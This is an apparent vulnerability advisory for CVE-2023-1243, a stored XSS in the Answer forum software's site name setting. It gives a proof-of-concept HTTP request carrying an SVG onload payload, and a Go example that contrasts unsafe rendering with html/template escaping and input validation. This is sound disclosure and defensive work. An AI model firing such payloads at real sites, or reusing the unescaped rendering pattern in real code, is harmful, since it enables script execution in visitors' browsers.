CVE-2023-1243 – Answer
Stored XSS
Answer lets an administrator customize the "Site Name" during installation or later in the settings page. Because that value is not sanitized, arbitrary HTML can be stored in it, which allows JavaScript to execute in the browser.
Every time a user visits the website, the stored XSS is triggered.
POC – Proof of concept
POST /installation/base-info HTTP/1.1
Host: localhost:9080
Content-Length: 175
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Content-Type: application/json
Accept-Language: en_US
sec-ch-ua-mobile: ?0
Authorization:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://localhost:9080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9080/install
Accept-Encoding: gzip, deflate
Connection: close
{"lang":"en_US","site_name":"\"><svg onload=alert(1)//","site_url":"http://localhost:9080","contact_email":"[email protected]","name":"admin","password":"admin","email":"[email protected]"}
PAYLOAD: "><svg onload=alert(1)//
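The defect described above is the classic stored-XSS pattern: an admin-controlled string is written into page markup without encoding. The following Go program is an added example, not code from the Answer project; it renders the proof-of-concept payload through a naive string concatenation and through html/template, and adds a defense-in-depth input check for the settings endpoint. The function names (RenderUnsafe, RenderSafe, RejectMarkup) and the exact markup the site name is assumed to land in (an og:site_name meta tag and the title element) are assumptions for illustration only.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
	"html/template"
	"strings"
)

// Payload is the site_name value from the proof of concept above.
const Payload = `"><svg onload=alert(1)//`

// RenderUnsafe mirrors the vulnerable pattern: the site name is concatenated
// straight into the markup, so the leading '"' in the payload closes the
// attribute value and the <svg> element becomes part of every rendered page.
// (Assumed markup; where Answer actually emits the site name is not shown here.)
func RenderUnsafe(siteName string) string {
	return fmt.Sprintf(`<meta property="og:site_name" content="%s"><title>%s</title>`,
		siteName, siteName)
}

// pageTmpl is the same markup as a html/template. Its contextual autoescaper
// encodes the value according to where it is inserted (attribute value vs.
// element text), so '"', '<' and '>' from untrusted input become entities.
var pageTmpl = template.Must(template.New("page").Parse(
	`<meta property="og:site_name" content="{{.SiteName}}"><title>{{.SiteName}}</title>`))

// RenderSafe renders the same markup through html/template. The returned
// string never contains a raw '<' or '"' that originated in siteName.
func RenderSafe(siteName string) (string, error) {
	var buf bytes.Buffer
	err := pageTmpl.Execute(&buf, struct{ SiteName string }{siteName})
	return buf.String(), err
}

// RejectMarkup is a server-side validation step for the installation and
// settings handlers: a site name has no legitimate need for markup
// metacharacters, so reject them before the value is ever stored. Output
// encoding (RenderSafe) remains the primary control; this only narrows the
// stored data.
func RejectMarkup(siteName string) error {
	if strings.ContainsAny(siteName, `<>"'`) {
		return errors.New("site_name must not contain HTML metacharacters")
	}
	return nil
}

func main() {
	fmt.Println("unsafe:", RenderUnsafe(Payload))
	safe, err := RenderSafe(Payload)
	if err != nil {
		panic(err)
	}
	fmt.Println("safe:  ", safe)
	fmt.Println("validation:", RejectMarkup(Payload))
}
```

Running the program shows the unsafe rendering containing a live `<svg onload=alert(1)` element, while the html/template output carries `&#34;&gt;&lt;svg ...` as inert text; the validation step rejects the value outright.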
Impact
The impact is JavaScript code execution in the browser of every visitor to the site. However, admin privileges are required to edit the vulnerable input field.
Severity
https://cvss.js.org/#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L
Reference
https://nvd.nist.gov/vuln/detail/CVE-2023-1243
https://huntr.dev/bounties/1d62d35a-b096-4b76-a021-347c3f1c570c/
https://github.com/answerdev/answer